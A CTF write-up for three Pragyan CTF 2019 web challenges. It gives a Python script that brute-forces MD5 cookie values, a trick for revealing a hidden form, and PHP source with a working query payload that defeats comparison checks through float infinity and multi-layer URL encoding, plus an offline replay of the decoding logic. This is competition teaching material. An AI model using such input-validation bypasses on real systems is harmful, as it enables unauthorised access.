Pragyan CTF19 web writeup

Do prepare to see cookies lurking everywhere. http://159.89.166.12:13500/

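import requests
import hashlib
from itertools import product
import string

flag = []
wordlist = string.printable

# Collect the 'flag' cookie from 40 consecutive requests in one session
s = requests.session()
for i in range(40):
    cookie = s.get('http://159.89.166.12:13500/').cookies['flag']
    flag.append(cookie)
print(flag)

# Treat each cookie as an MD5 digest and brute-force its two-character preimage
result = []
for i in flag:
    # product() also covers doubled characters such as "aa", which permutations() skips
    for j in product(wordlist, repeat=2):
        guess = "".join(j)
        md5 = hashlib.md5(guess.encode("utf8")).hexdigest()
        if md5 == i:
            result.append(guess)
            break
print(result)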

Game of Faces 100

The Game of Faces, welcomes you. In this era, where AIs generate a lot of faces, we would like you to contribute to the same by uploading your image. Thank you for contributing, to continue.

http://159.89.166.12:15000/

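Delete the CSS and a fake submit form appears. Submitting it returns a base64 string, which decodes to The_scroll_says=the_night_kingVSvalyrian.txt, so just request that file directly: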
http://159.89.166.12:15000/the_night_kingVSvalyrian.txt

Mandatory PHP 125

PHP, PHP everywhere get the flag and earn your points there.

http://159.89.166.12:14000/

<?php
include 'flag.php';
highlight_file('index.php');
$a = $_GET["val1"];
$b = $_GET["val2"];
$c = $_GET["val3"];
$d = $_GET["val4"];
if(preg_match('/[^A-Za-z]/', $a))
    die('oh my gawd...');
$a=hash("sha256",$a);
$a=(log10($a**(0.5)))**2; // pass val1=pp and this evaluates to float(INF) in PHP
if($c>0&&$d>0&&$d>$c&&$a==$c*$c+$d*$d) // so pass an infinitely large value here too
    $s1="true";
else
    die("Bye...");
if($s1==="true")
    echo $flag1;
for($i=1;$i<=10;$i++){
    if($b==urldecode($b)) // so val2 has to be URL-encoded 11 times
        die('duck');
    else
        $b=urldecode($b);
}
if($b==="WoAHh!")
    $s2="true";
else
    die('oops..');
if($s2==="true")
    echo $flag2;
die('end...');
?>

payload: http://159.89.166.12:14000/?val1=pp&val2=WoAHh%2525252525252525252521&val3=1&val4=100000000004000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
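
Why val2 needs exactly 11 layers of encoding, replayed offline as an added example (not part of the original writeup or the challenge source). It assumes Python's `unquote_plus` is an adequate stand-in for PHP's `urldecode()` and that PHP decodes the query value once while filling `$_GET`; the function names are made up for the illustration.

```python
from urllib.parse import quote, unquote_plus

TARGET = "WoAHh!"  # string the challenge compares $b against


def php_get(raw):
    """PHP URL-decodes each query value once while filling $_GET."""
    return unquote_plus(raw)


def val2_branch(raw, rounds=10):
    """Replay the val2 loop from index.php and return the branch reached."""
    b = php_get(raw)
    for _ in range(rounds):
        decoded = unquote_plus(b)  # stand-in for PHP urldecode()
        if b == decoded:           # nothing left to decode -> die('duck')
            return "duck"
        b = decoded
    return "flag2" if b == TARGET else "oops.."


def encode_layers(value, layers):
    """Percent-encode every reserved character, `layers` times over."""
    for _ in range(layers):
        value = quote(value, safe="")
    return value


def accepted_layer_counts(max_layers=15):
    """Encoding depths (0..max_layers) that reach the flag2 branch."""
    return [n for n in range(max_layers + 1)
            if val2_branch(encode_layers(TARGET, n)) == "flag2"]


if __name__ == "__main__":
    for n in (0, 10, 11, 12):
        print(n, encode_layers(TARGET, n), val2_branch(encode_layers(TARGET, n)))
    print("accepted depths:", accepted_layer_counts())
```

One layer is consumed by PHP itself and ten by the loop, so fewer layers hit `die('duck')` and more leave an undecoded `%` behind and hit `die('oops..')`.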